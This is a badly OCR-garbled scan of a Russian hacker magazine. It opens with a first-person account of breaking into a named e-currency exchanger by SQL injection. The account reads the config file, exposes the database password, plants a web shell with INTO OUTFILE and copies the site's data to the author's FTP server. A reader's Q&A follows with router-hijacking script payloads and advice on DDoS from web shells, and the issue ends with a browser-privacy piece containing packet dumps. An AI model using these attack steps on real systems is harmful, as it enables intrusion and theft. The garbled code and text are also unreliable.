поД а ѵаіісі МуЗОЬ гезиІД гезоигсе 
іп /Дюте/тесіісаіс /риЫіс_ііДт1/ 
тесіісаі/іпсіех . ркр оп Ііпе 416 

Отлично! 50Е-инъекция во всей ее красе! 

□ Штурмуем инъекцию! 

Ксожалению, разработчики Му50І_ не предус- 
мотрели в ней функций вроде ІЭ N 1 0 N 5ЕІ_ЕСТ 
АІ_І__0АТАЕ>А5Е_01ІМР или ІІЫІОЫ 5ЕЕЕСТ 
ОТ О АУ_М N Е_Ѵ5 Е_РА Р О І_І :), поэтом остава- 
лосьтолько подобрать количество столбцов и 
узнать имена таблиц, что я и принялся делать. 
Как выяснилось, столбцов было всего 6 и 
запрос, который бы выполнялся без ошибок, 
выглядел так: 

ДЩДр : / /тесіісаіс . иа/іпсіех .рЬр?ісі= 
1+ШІСЖ+зеІесД + 1 ,2, 3,4,5, 6/* 

Сначала я собрал информацию о версии 
Му50І_-базы и отом, с чем я вообще имею дело: 
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> Пользуясь случаем, 
выражаю огром- 
ную благодарность 
_1п!ЗсШг_за помощь 
во взломе и написа- 
нии этой статьи :). 

>Эту статью стоит 
рассматривать 
исключительно как 
материал для озна- 
комления. Ни автор, 
ни редакция не несут 
ответственности за 
применение ее в про- 
тивозаконных целях. 
Следует помнить, что 
если ты вдруг, начи- 
тавшись, взломаешь 
что-нибудь чужое, то 
отвечать за все бу- 
дешьтолькоты один. 
Мы тебя ни к чему 
та кому криминаль- 
ному не призываем, 
наоборот, всячески 
уговариваем не нару- 
шать законов. 




ч 



> На нашем сайте 
ЬеЦкпідЫв.ѵоісІ.ги ты 
найдешь весь софт, 
который помогмне 
осуществить этот 
нелегкий взлом. 



/060 



ЬДБр : / /шесіісаіс . иа/ іпсіех . 
рЪр?ісі=1+ШІ(Ж+зе1есБ+і , 2 
, 3 , 4 , 5 , б , изег ( ) /* 

Ь.ББр : //шесіісаіс .иа/ іпсіех. 
рЬр?іс1=1+ШІСЖ+зе1ес1і + 1 , 2 
, 3 , 4 , 5 , 6 , сІаДаЬазе ( ) / * 
іЩДр : / /шесіісаіс . иа/ іпсіех . 
р1тр?ісі=1+ШІ0Ы+зе1есЦ + 1 , 2 
, 3 , 4 , 5 , б , ѵегзіоп ( ) / * 

Чтобы не быть ГОЛОСЛОВНЫМ, ПОЯСНЮ: с 
помощью первого запроса я узнал имя 
пользователя БД, которая могла быть 
доступ на только с ІосаІЬозС с помощью 
второй — имя базы тебісаіс, а посредс- 
твом третьей — версию МуБОБ (так, на 
всякий случай). 

Со столбцами дело не шло — названия 
угадать неудавалось никаким образом. 
И тут я подумал: а вдруг получится про- 
читать конфигурационный файл через 
МуБОБ-функцию І_0АБРІІ_Е()? Приви- 
легий может и не хватить, но попытка не 
пытка :). Крометого, абсолютный путь 
до сайта у меня есть. Скрестив пальцы, 
я выполнил следующий запрос: 

ііСБр : //шесіісаіс .иа/ іпсіех. 
рЪр?ісі=1+ШІСЖ+зе1ес1с + 1 , 2 
,3, 4,5,6, ЬОАБРІЬЕ ( ' /Ьоше/ 
шесіі с а 1 с / риЫ і с_Ь Дші / 
шесіісаі / іпсіех. рАр 1 ) /* 

Я подпрыгнул от радости — на экране 
замелькали строчки кода из самого 
іпбех.рбр! Отлично! Я быстро нашел в 
коде строку «іпсІисІеМЬсопбд.рЬр»]» 
и интуитивно понял, что там хранятся 
логин и пароль к базе данных: 

<?рЪр 

$С(ЖРІС [ 1 сіаіаЬазе 1 ] = 
'шесіісаіс ' ; 

$С(ЖРІС[ ’изег ' ] 

'шесіісаіс ' ; 

$ССЖРІС [ ' раззѵскі ' ] = 

' АіЬкУ;)іі ' ; 

$С(ЖРІС[ ' Ьозі, ' ] 

' ІосаІЬозД ' ; 

?> 

Далее я, естественно, решил залоги- 
ниться в рЬрМуАбтіп со связкой паро- 
лей: «тебісаІс:А1БкУ|іі». Стоитли гово- 
рить, что пароли подошли и я уже вовсю 
пользовался прелестями рЬрМуАбтіп. 
В базе данных ничего полезного я не 
нашел, спам-базы даже на $1 бы не 
хватило. И тутя задался вопросом: ну 



попал в я рЬрМуАбтіп, что дальше? 

(ну пробил ты стенку головой, и чтоты 
будешь делать в соседней камере? 
Примечание РогЬ’а). Пробую залоги- 
ниться на РТР — «Іодіп і псоггесі». 

Есть еще один способ выхода из этой 
ситуации — получение шелла через 
БОБ-запросытипа «ІКІТО ОБІТРІБЕ». 
Идеятакова: сначала мы пишем в какую- 
нибудь колонку таблицы нечто вроде «<? 
вувІюгтДФДЗЕТГсппсГ]); ?>»или что-то 
подобное. Например,«<? іпсІибе(«Ыф:// 
МЗІс1у.пагоб.ги/г57зЬеіихЫ; ?>». 
Единственный минус этого инклуда 
— невозможность работы с ѲЕТ-запроса- 
ми. Ну и ладно!Такие шеллы, какг57зЬеІ1 
от небезызвестной гзЕѵоісБги . работают 
исключительно с РОБТ-запросами, 
крометого, известно, что Р05Т сорит 
в логах веб-сервера намного меньше, 
чем 6ЕТ, что является его неоспоримым 
преимуществом для хакеров. 

Что-то мы отвлеклись :). Итак, записы- 
ваем наш РНР-код, например, втаблицу 
теб_изегз, в колонку раззѵѵогб с іб, 
равным 20. В итоге при запросе типа 
«БЕРЕСТ раззѵѵогб ЕРОМ теб_и5егз 
ѴѴНЕПЕ іб=20» на экране должен поя- 
виться тот самый РНР-код, который мы и 
вбивали в БД. В МуБОБ есть флагзапро- 
са «ІКІТО ОБІТРІБЕ», который позволяет 
вывести его результат в те кетовый файл. 
Я клоню ктому, что если выводить ответ 
от50Бтак:«5ЕБЕСТ раззѵѵогб ЕРОМ 
теб_и5егзѴѴНЕРЕ іб=20 ІІЧТО ОБІТРІБЕ 
ѴЬоте/тебісаІс/риЬІІс_ЬітІ/тебісаІ/ 
іетр.рЬр'», то можно без проблем залить 
полноценный веб-шелл. Но итутесть 
свои подводные камни. Во-первых, 
хватаетли утебя привилегий БОБ-юзера, 
чтобы работать с ІКІТО? И, во-вторых, не 
забывай про права на запись в файлах и 
папках. Но итутмне повезло :). Правда, 
не с первого раза. В корневую веб-ди- 
ректорию залить ничего не получилось. 
Но я не сдался и начал подбирать другие 
папки, возможно, доступные для записи. 
Такой папкой была/Ьоте/гпебісаІс/ 
риЬІіс_ЬітІ/тебісаІ/диезіЬоок. 

Я выполнил запростак: 

ЗРЬРСТ раззѵ\гогс1 РКОМ 
тесЦизегз ШРКЕ ісі=2 0 ШТО 
ОЦТРІЬР ' /Ьоше/шесіісаіс/ 
риЫіс_ІЩт1 /шесіісаі / 
диезДЬоок/Детр . рАр ' 

Перешел по адресу ЬирУ/тебісаІс. 
иа/диезіЬоокАетр.рЬр и увидел 



веб-шелл! Моей радости снова не было 
предела! Что касается операционки, 
то это была ЕгееВБй 6.0. Поднимать 
привилегии не имело смысла — как я и 
предполагал, прав на чтение директо- 
рии самого обменника вполне хватало! 
Я поспешил сделать дамп БД обмен- 
ника и всех скриптов этого сайта, но 
тут был облом :). Поскольку на сервере 
стоял Баію Мобе, упаковать файлы в 
Іаг-архив не получалось, так какбыло 
невозможно выполнять команды (нато 
это и Баію Мобе). 

Копипаститьархивы былозанятием для 
мазохистов, крометого, я боялся, что 
в папке диезШоок перезапишу старые 
скрипты. 

Тутна помощь пришел один из сцена- 
риев ОхѲоЬЕТР, который ты можешь 
найти на нашем сайте. Он занимается 
тем, что заливает любые файлы из 
заданной директории на удаленный 
ЕТР-сервер, тоже в нужную тебе папку. 
Скриптудачно выполнил свою работу, 
несмотря на ограничения подлого РНР. 
Кстати говоря, сначала я хотел залить 
регі'овый веб-шелл в папку /сді-Ьіп, 
но, ксожалению, мои привилегии были 
минимальны (побобу). Зайдя на свой 
РТР, я сжал все скрипты в один архив и 
слил себе на комп, нашел в сценариях 
конфигбазы данных и быстренько 
сотворил дамп МуБОБобменника. 

К слову сказать, система работала 
практически на одних скриптах от 
ѴѴеЬМопеу. Почитать об этом можно в 
сентябрьском «Хакере» за 2005 год в 
статье п і кііогг'а «Механика ѴѴМ-про- 
цессинга», а мы сейчас опустим этот 
момент. 

□Люди веером 

Короче, после того как я достал все, что 
мне было нужно, я задумался над тем, а 
стоило ли это делать. Ведь из-за каких- 
то жалких 500 ѴѴМ2 (ну или больше, 
рисковать — лезть в чужой кошелек — я 
не стал) можно сесть за решетку, так 
как это уже далеко не дефейс, а чистой 
воды криминал. Я связался садминист- 
ратором и вместе с килограммами мата 
в мою аську получил презент — энную 
сумму денег в качестве благодарности. 
Я с недоверием принял подароки до 
сих пор жду стука в дверь добродуш- 
ных ребят в сером. Смастерил убийцу 
жестких дисков по инструкциям летнего 
номера «X» и теперь, как говорится, 
всегда готов :). Ш 
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Хватит 

изобретать 

колесо! 

Сепіиз придумал кое-что получше. 
ОрІоѴѴНееІ - и никаких колес! 




Технология ОрІоѴѴНееІ, впервые реализованная в модели Тгаѵеіег 355 І_азег - это оптический скроллинг, 
действующий в 4-х направлениях, расположенный на месте традиционного механического колесика прокрутки 
и обеспечивающий плавные, а главное - точные движения. 




ѵѵѵѵѵѵ.депіиз.ги 




взлом 



» 




ЕВГЕНИЙ «СОРПЛ/ІІЧ» ЕРМАКОВ 

/ Н АСК-ГАО@ПЕАІ_. ХАКЕР. ПІІ / 





( V СЛЫШАЛ ПРО 0005-СИСТЕМЫ, БАЗИРУЮЩИЕСЯ НА ШЕЛЛАХ. 

НАСКОЛЬКО ЭТО ЭФФЕКТИВНО? 

^А: В отличие от ВОоЗ’а посредством ботнета, организовать 00о5 с 
помощью шеллов намного легче. Тут нам нужны только веб- 
шеллы (30-60 штук) и удобная система. Я работал с несколькими 
системами, базирующимися на скриптах. В паблике таких паке- 
тов очень мало (к примеру, давно появившийся в пабе ЗтегсЬ). 
Завалить с их помощью сервера с большим каналом достаточно 
сложно, но возможно. Просто общая пропускная способность 
серверов, используемыхдля ООоЗ’а, должна быть больше, чему 
атакуемого сервера. Достаточно эффективны системы, использу- 
ющие в качестве панели управления рбр-скрипты, а в качестве 
самого ООоЗ’ера регі-скрипт (СуЬег ООоЗ Зузіегш). Сейчас разве- 
лись барыги, продающие один лишь регі-скрипт, и я не советую 
брать такие вещи, хотя бы потому что неудобно заливать вручную 
скрипт, допустим, на 40 шеллов. 

^0: ВСЕ ЧАЩЕ И ЧАЩЕ ВИЖУ ОБЪЯВЛЕНИЯ О ПРЕДОСТАВЛЕНИИ 

ПРОКСИ-СЕРВИСОВ. НЕУЖЕЛИ ТАК ПРОСТО МОЖНО НАЧАТЬ ЗАРА- 
БАТЫВАТЬ? КАКИЕ НУЖНЫ ВЛОЖЕНИЯ? 

^А:Для начала решим: будем ли мы делать все сами или прибегнем к 
помощи сторонних лиц. Если мы выбираем второй путь, то необ- 
ходимо определиться, во что придется вложить деньги: 

1. загрузки софта; 

2. разработка софта; 

3. абузоустойчивый хостинг (на первых порах нужно быть готовым к мно- 

годневным ООоЗ-атакам, абузам от конкурентов; сейчас борьба 
между прокси-сервисами ожесточилась как никогда и люди идут 
на любые меры, чтобы отбить клиентов); 

4 . реклама; 

5 . разработка веб-интерфейса/сайта (я сам недавно столкнулся стем, что 

клиенты нежелаютбрать прокси списками через аську или мейл, 
всем хочется интерактивности, и без фейса сервис может вообще 
не принести никакой прибыли). 

Атеперь посчитаем, сколько (максимально) это все может стоить: 

1. загрузки софта — всезависитоттвоего желания; можно вложить$500, 

а можно и $5000; 

2 . разработка бота — $1 00-300; 



3. покупка хостинга — $30-80; 

4 . реклама — $100-200; 

5 . разработка сайта — $100-150. 

Итог: $700 (без загрузок). 

Естественно, цены колеблются в довольно широких пределах, и не факт, 
чтоутебя получится именнотакая сумма. Я же исхожу исключи- 
тельно из своего опыта и опыта своихзнакомых. 

цѵ ЕСТЬ ЛИ СПЕЦИАЛИЗИРОВАННЫЕ АТАКИ НААОБЬ-МОДЕМЫ? 

МОЖНО ЛИ ВЗЛОМАТЬ ЧЕЛОВЕКА, ИСПОЛЬЗУЮЩЕГО РОУТЕР? 

В^А: В модемах периодически обнаруживаютуязвимости, но они, как пра- 
вило, не позволяют получить удаленный доступ. Наиболее прос- 
тым и очевидным способом взлома здесьявляется банальная 
проверка на дефолтные пароли. Можно просканировать диапазон 
ІР-адресов на предмет ѵѵеЬ-сервисов и попробовать подключить- 
ся к веб-интерфейсу модема, а дальше вбивать дефолтные пассы. 
Если повезет, получишьуправление модемом. Если речь идето 
массовом взломе произвольных юзеров, то здесь можно заразить 
индексную страницу взломанного сайта несколькими строчками, 
меняющими дефолтный парольна наш. Пример: 

<зсгірк згс= " абшіп : асітіп@192 . 168 . 1 . 0/1одіп.р1ір?С]тапде= 
192.168.1.200" ></зсгірк> 

<зсгірк згс=" ас!тіп:раззѵ\гогс1@192 . 168 . 1 . О /Іодіп . ркрРСкап 
де=192 .168.1.200" ></зсгірД> 

<зсгірО згс=" асітіп : асЗтіп@192 . 168 . 1 . 0/Зекир.ркр? 
Ыоск=ІР" ></зсгірк> 

<зсгірк згс= " абтіп : асЗтіп@192 . 168 . 1 . 0/ЗеДир .ркр? 
Ыоск=ІР" ></зсгірк> 

Сначала авторизуемся и лишь потом изменяем настройки. 

Ноздесь не всетак просто, и сначала следует определить тип модема/ро- 
утера. Для этого Оипдзопп’ом был написан скрипт: 

<зсгірк> 
бипскіоп ІР ( ) 

{ 

кгу { 







ѵаг зоск = пето з аѵа . пек . 8оск#к ( ) ; 

воск . Ъіпсі (пето з аѵа . пек . ІпекЗоскекАсІсІгезз ( ' 0 . О . О . О ' , 

0) ) ; 

зоск . соппеск (пето з аѵа . пек . ІпекЗоскекАсІсІгезз (сіосшпепк . 
сіотаіп, ( Ісіоситепк . Іосакіоп . рогк ) ?8 0 :<іосишепк . 
Іосакіоп . рогк ) ) ; 

асісігезз = зоск . декЬосаІАсісігезз ( ) . декНозкАсМгезз ( ) ; 
гекигп асісігезз; 

} саксЪ. (е) { асісігезз = "192.196.1.0"; } 

} 

</зсгірк> 

Идентифицируем устройство: 

<ітд згс= "кккр : //<зсгірк>ІР ( ) ; </зсгірк>/Ішадез/Ьодо . 
дік» опЕггог= " аіегк ( ' Ыок коипсі, Іекз кгу РНР 
пото .');"> 

Ищем роутеры: 

<? 

# Вгике зеагск а гапде тоікк РНР 
ког ($і=200; $і<255; $і++) { 

?> 

<ітд згс= "кккр: //192.168.1.<?=$і; ?>/Ітадез/Ьодо . 

дік" опЬоасі= "аіегк ( 'I коипсі кке Коикегі ір: 

192 .168.1. <? = $і; ?>' ) ; "> 

<? 

} 

?> 

Проверка большого количества пользователей можетзанять много вре- 
мени, так что дело за тобой — совершенствуй. 

Список дефолтных паролей ко многим устройствам есть на 

ШрУ/рЬепоеІікіе/брІ/ірІ.ЬітІ . 

ВоЧ^ХОЧУ ОРГАНИЗОВАТЬ ХОСТИНГ НА БОТАХ, 

ВОЗМОЖНО ЛИ ТАКОЕ? 

ВоА: Это достаточно объемная тема, которая заслуживает отдельной 

статьи, так что я лишь перечислю вкратце ее основные аспекты: 

1. Распределенное хранение контента на ботах. 

Разработать стабильную схему работы сложно, да и для предоставления 
большого хостинга потребуется значительно большее количест- 
во ботов, чем для обычного □ОоЗ’а, плюс нужны толстые каналы. 
То есть необходимо рассчитать наиболее оптимальный объем 
хранимой инфы на каждом боте. 

По идее, такой хостинг использовать не получится, так как непонятно, 
к какому адресу будут обращаться клиенты. Можно привязать 
к каждому боту виртуальный адрес (будем ориентироваться на 
грубую схему «бот страница»), который впоследствии пре- 
доставлялся бы клиенту. Мы даем юзеру, например, айпишник 
предполагаемой страницы 123.456.78.9, а сами перебрасываем 
его на 1 23.456.79.9. Да и управлять подобным «хостингом» при- 
дется исключительно через какой-либо фейс (ѵѵеЬ-интерфейс, 
например). В общем, отбрасываем этотбред сразу. 

2. Использование ботов как кэширующий сервер, забирающий содержи- 

мое со стороннего сервера. 



3. Коннект по домену, к которому цепляется адрес определенного бота. 

После «смерти» бота с главного бэкапного сервера заливается кли- 
ентский контент на нового бота, адрес которого цепляется кдомену. 

ВоЧ^ ПРОЧЕЛ О ТЕОРЕТИЧЕСКОЙ РЕАЛИЗАЦИИ АТАКИ РМ5 В ѴѴІ-РІ 
СЕТЯХ. КАКОЙ СОФТ ИСПОЛЬЗОВАТЬ ДЛЯ ЭТОГО? СИЖУ под инт/ 
РКЕЕВ50. 

ВоА: Тут можно однозначно посоветовать программу бѵѵерсгаск 

( ѵѵѵѵѵѵ.сІасЬЬОсІеп.сот/рго^сІз/бѵѵерсгаск.ЬітІ- ) из известного 
комплекта сіѵѵериіііз ( ѵѵѵѵѵѵ.басЬЬОбеп.сот/ргощсІз/бѵѵериШз. 
Мт!), входящего в Ьзб-аіИюоІз. Подробности об использовании 
читай в ПЕАОМЕ. 

м КАКИЕ НОВЫЕ ТЕНДЕНЦИИ ПРЕДВИДЯТСЯ В Х55-АТАКАХ? 
МОЖЕТ, ПОЯВИЛИСЬ НОВЫЕ ТЕХНОЛОГИИ, ИЛИ ВСЕ ОСТАНОВИ- 
ЛОСЬ НА СТАНДАРТНОМ УГОНЕ КУКИСОВ? 

ВоА: Как ни странно, но у спецов по информационной безопасности и 
просто энтузиастов получается выжить последние соки изХ55. 
Стали возникать новые (а зачастую хорошо забытые старые) 
разновидности Х55-атак, например С5ПЕ-атака (почитать о ней 
можно здесь: ЫкрУ/зеси гііѵіа Ь.ги/а па 1уііс5/292473. рИ р ) . немного 
похожая на Х55. Также появилась новая (из серии «открыли 
Америку») атака Огіѵе-Ву РЬагтіпд, заключающаяся в измене- 
нии настроек маршрутизатора посредством вредоносного кода, 
встраиваемого в страницы сайта В недалеком будущем эксперты 
прогнозируют появление «умных» Х55-червей и ООоЭ-атак, 
построенных на этих самых червях, а также разного рода мал- 
варей (таіѵѵаге), базирующихся на вебе. Фишеры тоже не стоят 
на месте, постоянно используя Х55-баги для обворовывания 
доверчивых юзеров. 

Во*Оі НАДОЕЛО ПОСТОЯННО ДОВЕРЯТЬ АВЕРАМ: ТО У НИХ ОБЫЧ- 
НЫЙ ВЕБ-ШЕЛЛ ОПРЕДЕЛЯЕТСЯ КАК«ОПАСНЫЙ ЗВЕРЬ», ТО ОНИ 
НЕ МОГУТ НАЙТИ СВЕЖИЙ РУТКИТ В МОЕЙ СИСТЕМЕ. ЕСТЬЖЕЛА- 
НИЕ ВСЕ ДЕЛАТЬ РУЧКАМИ, НО ЧТО ДЛЯ ЭТОГО НУЖНО? 

ВоА: Даже опытные вирмейкеры, если есть подозрение в заражении, 

сначала уступают место аверам и только потом работают вручную. 
Автоматизация — великая вещь и делать все самому довольно 
иррационально. Нуа что требуется для этого, думаю, итакпо- 
нятно:знаниеассемблера, дизассемблеров (вроде ЮА), ключей 
реестра, умение работать с таким софтом, какдекомпиляторы и 
распаковщики. 

Во*Оі ПОДСКАЖИ, КАКИЕ ЕЩЕ СУЩЕСТВУЮТ Ш5 ДЛЯ ѴѴІ-РІ СЕТЕЙ С 
ОТКРЫТЫМИ ИСХОДНИКАМИ, КРОМЕ 5Н0КТА И ДРУГИХ, НЕДАВНО 
ПЕРЕЧИСЛЕННЫХ ВЖУРНАЛЕ? 

ВоА: ѴѴЮ5, имеющая стандартный функционал (обнаружение частых 
запросов, детектинг затопления запросами, анализ фреймов 
и т.д.), но отличающаяся наличием своего рода механизма 
Нопеуроі для приманки потенциальных взломщиков. 

Еще одна система со сходным первой названием — ѴѴІ 02 , умеющая 
противодействовать атаке ЕѵіІТѵѵіп (то есть находить под- 
ставныеточки доступа), мониторить сеть на подозрительный 
трафик ит.п. Ксожалению, в ней периодически находят 
уязвимости. 

Ну и не стоит забывать отом, что в Кізгшеітоже есть функции Ю5. ПЕ 
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У Соодіе под колпаком 1 

ШПИОНСКАЯ ВКЛАДКА XXI ВЕКА 

Право на ргіѵасу, уже и без того изрядно потрепанное в боях, подверглось очередной 
атаке. На этот раз — со стороны гиганта Соо§1е, шпионящего за нами с помощью закла- 
док, встроенных в популярные браузеры (Горящий Лис, Опера), а также панель Соо§1е 
ТооІЬаг, установленную у миллионов пользователей. Но как обнаружить факт шпиона- 
жа (я, например, обнаружил это чисто случайно), какая именно информация передает- 
ся, чем это нам грозит в практическом плане и можно ли предотвратить разгул безобра- 
зия своими собственными силами? Сейчас посмотрим, мой друг, сейчас посмотрим... 



нтернет представляет собой от- 
личный инструмент для контроля 
над деятельностью его обитате- 
лей, в котором заинтересованы и 
правительственные учреждения, и круп- 
ные/мелкие корпорации, и не в последнюю 
очередь хакеры. Да и стандартный браузер 
предоставляет слишком много информации 
о клиенте, передавая ее узлу, с которым 
осуществляется соединение: тип и версию 
операционной системы и самого браузера, а 
также адрес предыдущей посещенной стра- 
ницы. Невероятно богатая информация для 
статистического анализа, но, ксожалению 
аналитиков (и ксчастью простых пользова- 
телей), полностью децентрализованная и 
разобщенная: не существует никакого едино- 
го центра по сбору данных, и хотя некоторые 
фирмы предоставляют бесплатные счетчики 



(типа ѵѵѵѵѵѵ.5ру1_од.ги ). они контролируют 
л ишь те сетевые ресурсы, на которых они 
установлены. 

Панельуправления боодіе ТооІЬаг, выпущенная 
для ГорящегоЛиса и ІЕ, не только упрощает 
ѵѵеЬ-серфинг, но и передает боодіе инфор- 
мацию о посещаемых узлах, типе и версии 
браузера/операционной системы, честно 
предупреждая об этом в пользовательском 
соглашении, поэтому тут никаких претензийу 
нас нет. По официальной версии, полученные 
данные не разглашаются, не передаются ника- 
кимтретьим лицам (типа ФБР), а используются 
исключительно дляулучшения качества поиска. 
Наиболее часто посещаемые ссылки получают 
более высокий приоритет и выводятся первыми, 
отчего выигрывает как сама поисковая машина, 
так и конечные пользователи (независимо от 
того, установлена у них Ѳоодіе ТооІЬаг или нет). 



Естественно, далеко не каждый готов делиться с 
боодіе какой быто ни было личной информацией. 
Поэтому компания вступила в сговор с разработ- 
чиками некоторых популярных браузеров (Горя- 
щий Лис, бпера), убедив их встроить специальные 
закладки, скрыто передающие информацию обо 
всех действиях пользователя в специальных 
аналитический центр. Последний, естественно, 
принадлежит боодіе. Быть может, в этом и кроется 
секрет бесплатности бперы? Какзнать. 

Ладно, не будем гадать на кофейной гуще, а лучше 
пронаблюдаем за процессом передачи данных 
своими собственными глазами и подумаем, как 
предотвратить утечку персональной информации, 
раскрытие которой может иметь определенные 
последствия. В частности, хакеры давно и небез- 
успешно используют боодіе для атакна сайты, 
о чем можно прочесть в статье «боодіе Наскіпд 
Іог Репеігабоп Тезіегв», написанной хакером по 
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> При заходе на сервер Ьир://пе 2 иті.огд.ги Горящий Л истайком передает какую-то инфор- 
мацию поадресам 72.14.217.93 и 209.85.137.99, принадлежащим корпорации Ооодіе 



^ 1 ѵічии і 

> Внешний вид персонального брандмауэра 



считать надежно установленным. Остается 
только выяснять, какая именно информация 
передается. Это легко! Достаточно взгля- 
нуть на окно дампа, содержимое которого 
приведено ниже: 



прозвищѵЗоЬппѵЕопд: ѵуѵѵуѵ.ЬІаскЬаЕсопп/ 
рге5епІаІіоп5/ЬЬ-еигоре-05/ВН ЕЦ 05-Бопд.рск 
Больше всего, конечно, от этого страдают вла- 
дельцы ѵѵеЬ-серверов, ной обычным пользо- 
вателям временами приходится несладко. Так 
что... займемся экспериментами. 

□ Готовим операционную 

Итак, что нам понадобится? Горящий Лис (вер- 
сия 1 .5), I Щегле! Ехріогег (версия 6.0.2800.1 1 06), 
Опера (версия 8.51 ). Остальные версии я 
не проверял, поэтому их поведение может 
отличаться отописанного. Еще нам потребу- 
ется снифер (грабитель сетевого трафика) и 
брандмауэр (для защиты отутечек информа- 
ции). Я использую 5уѲа!е Регзопаі Еігеуѵаіі от 
компании ЭуОаіе (ныне купленной корпорацией 
Зутапіес), включающий в себя неплохой пакет- 
ный фильтр. Если до версии 4.2 для некоммер- 
ческого использования он был бесплатен, то 
теперьза полную версию просят денежку, а из 
демонстрационной пакетный фильтр исключен. 
Поэтому приходится либо раскошеливаться, 
либо искать антиквариат, либо использовать 
какой-нибудьдругой брандмауэр плюс бес- 



бы исключить все побочные воздействия. Лично 
я юзаю Этаіі Ніір Эегѵег ( ШрУ/зтаІІзгѵ.сот ). 
который советую и остальным, тем более что для 
граждан бывшего СНГ он бесплатен. 

□ Взятие Горящего Лиса с поличным 

Берем свежеустановленного Горящего Лиса 
за хвост и идем по адресу ЫірУ/пегиті.огд.ги 
(адрес моего ѵѵеЬ-сервера). Открываем Бубаіе 
Регзопаі Еігеѵѵа II, лезем в «Бодз -> Раскеі 
Бод» (при этом галочка «Саріиге РцЦ Раске!» в 
«Орііопз -> Бод» должна бытьзаблаговремен- 
ноустановлена) и видим, что в пакетном логе 
появились какие-то странные и совершенно 
левые ІР-адреса, с которыми сношался процесс 
ІігеЬх.ехе через 80-й порт. Локальный адрес мо- 
его сервера в логе отсутствует, поскольку пакет- 
ный фильтр 5уда!е Регзопаі Еігеуѵаіі игнорирует 
трафик, идущий через ІоорЬаск-петлю 127.0.0.1. 
Попробуем выяснить, кому принадлежат эти ІР, 
определив ихдоменные имена посредством 
штатной утилиты ігасегБехе. Ее стараниями мы 
быстро узнаем, что адресу 72.14.21 7.93 соот- 
ветствует доменное имя Ьи-іп-!93.доодІе.сот . а 
209.85.137.99 - тд іп 199.доод1е.сот . 



ИНФОРМАЦИЯ, ПЕРЕДАВАЕМАЯ ЛИСОМ 
узлу ви-ш-Р93.еооеі_Е.сом 

0000: 00 30 80 ЗЕ БЕ 00 00 

АО : С5 С1 Б8 89 08 00 45 00 I 

.0.? Е. 

0010: 03 ЕЕ Е8 41 40 00 80 Об : 

68 30 53 ЕР 21 2Е 48 0Е | . . .А@. . . 
ЛОЗ. ! .Н. 

0020: Б9 5В 08 95 00 50 АС 7С : 

5В 7В 32 Е6 ЕБ Е4 50 18 I . [ . . . 

Р. I [{2. . .Р. 

0030: 41 6А 05 С4 00 00 47 45 : 54 

20 2Е 73 61 66 65 62 | Ад СЕТ 

/заГеЪ 

0040: 72 6Е 77 73 69 6Е 67 2Е : 

6С 6Е 6Е 6 В 75 70 ЗЕ 73 I гсжзіпд/ 
1оокир?з 

0050: 6Е 75 72 63 65 69 64 

ЗБ : 66 69 72 65 66 6Е 78 2Б | 
оигсеісі=1іге1ох- 
0060: 61 6Е 74 69 70 68 69 

73 : 68 26 66 65 61 74 75 72 | 
апЦірЫзЛ&ІеаБиг 

0070 : 65 73 ЗБ 54 72 75 73 

74 : 52 61 6Е 6В 26 63 6С 69 I 



« ЕСЛИ ДО ВЕРСИИ 4.2 ДЛЯ НЕИОММЕРЧЕСИОГО 
ИСПОЛЬЗОВАНИЯ ОН БЫЛ БЕСПЛАТЕН, ТО ТЕПЕРЬ 
ЗА ПОЛНУЮ ВЕРСИЮ НАДО ПЛАТИТЬ, А ИЗ ОЕМО 
ПАКЕТНЫЙ ФИЛЬТР ИСКЛЮЧЕН» 



платный ісрбитр ( ѵѵѵѵѵѵ.ісрсіитр.огд ). портиро- 
ванный под множество операционных систем, 
среди которых значится и ѴѴІпсІоѵѵз. 

Также для чистоты эксперимента рекомендуется 
установить свой собственный ѵѵеЬ-сервер, что- 



Ага! В воздухе уже запахло паленым. Оба 
адреса принадлежат корпорации Ооодіе и, 
что самое интересное, находятся в раз- 
личных подсетях. Короче, фактскрытой 
передачи персонал ьных данных можно 



ез=ТгизВКапк&с1і 

0080: 65 6Е 74 ЗБ 6Е 61 76 

63 : 6С 69 65 6Е 74 2Б 61 75 I 

епк =паѵс 1 і епк - аи 

0090: 74 6Е 2Б 74 62 66 66 26 : 65 
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> Блокирование ІР-адресов, принадлежа- 
щихузлам распределенной сети Зоодіе, на 
персональном брандмауэре БуОаІе Регзопаі 
Рігеѵѵаіі 



517812с17&д=іпЕо : 



>ѲоодІе ТооІЬагпередаетперсональную информациюузлам зЬ.доодІе.сот и 
ѵѵѵѵѵѵ.доодІе-апаМісз.сопп 



00В0: 68 74 74 70 25 33 41 

25 : 32 46 25 32 46 6Е 65 7А | 



6Е 63 76 65 72 ЗБ 31 I 
Ео-ЕЪЕЕ&епсѵег=1 
0 ОАО : 26 6Е 6Е 6Е 63 65 

ЗБ 2Б : 31 34 37 30 36 37 
37 35 I &попсе=- 
14706775 



. . . . . . & . 8 . ! . . Б 

0020: 89 63 09 49 00 50 Е7 Е4 : 17 

ЕЗ 89 73 В5 75 50 18 I .с.І.Р 

з .иР. 

0030: 44 70 ЗЕ 02 00 00 47 45 : 54 

20 2Е 73 65 61 72 63 I Вр>. . .СЕТ 



1іССр%ЗА%2Е%2Епе2 

00С0 : 75 6В 69 2Е 6Е 72 

67 2Е : 72 75 25 32 46 

2 0 48 54 | иті . огд . ги%2Е НТ 

00Б0 : 54 50 2Е 31 2Е 31 

ОБ 0А : 48 6Е 73 74 ЗА 20 

74 6Е | ТР/1.1. . 

НозЕ : Ео 



«ДРУГИМИ СЛОВАМИ, В ГОРЯЩЕГО ЛИСА ИЗНА- 
ЧАЛЬНО ВСТРОЕНО ЯДРО ПАНЕЛИ БООБЬЕ 
ТООЫЗАК, ПРИЧЕМ БЕЗ ВОЗМОЖНОСТИ ЕГО 
ОТКЛЮЧЕНИЯ ШТАТНЫМИ СРЕДСТВАМИ» 



Даже неспециалисту понятно, что Ьи-іп-Ш. 
доодіе.сот представляет собой ѵѵеЬ-сер- 
вер, которомуЛис посылаетзапрос«6ЕТ 
/заМЬгоѵѵзіпд/Іооки р?зои гсеісІ=1 : і геіох-а піір 
ЬізЬ&ІеаІигез^гизіРапк&сІіеп^паѵсІіепІ- 
аиЬЛЬЛ&епсѵег=1 ». Запрос вызываетскрипт 
/заІеЬгоѵѵзі пд/іооки р и передает строку 
параметров, включающую в себя среди прочей 
интересной информации зашифрованный ІІРІ_ 
посещаемой страницы вместе стипом/версией 
браузера/операционной системы, передавае- 
мых открытым текстом. 

А вот что передается узлу тд-іп-199.доод[е.сот : 

